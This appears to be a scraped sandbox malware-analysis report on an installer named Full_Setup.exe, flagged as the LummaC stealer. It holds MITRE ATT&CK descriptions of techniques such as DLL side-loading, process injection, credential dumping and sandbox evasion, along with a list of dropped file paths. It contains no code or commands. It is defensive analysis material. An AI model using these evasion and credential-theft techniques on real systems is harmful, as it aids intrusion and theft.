Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Full_Setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\2264c7d1

C:\Users\user\AppData\Local\Temp\8R65FTCZQK06W5IFC.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3t0c3k0r.way.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5by5rkt.cbg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1sq4xfl.y1k.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l54yitqp.ivj.psm1

C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-2DAON.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_isdecmp.dll

C:\Users\user\AppData\Local\Temp\is-427IU.tmp\_isetup\_setup64.tmp

C:\Users\user\AppData\Local\Temp\is-L5MEA.tmp\8R65FTCZQK06W5IFC.tmp

C:\Users\user\AppData\Local\Temp\is-SAGGN.tmp\8R65FTCZQK06W5IFC.tmp

C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

Windows Analysis Report
Full_Setup.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre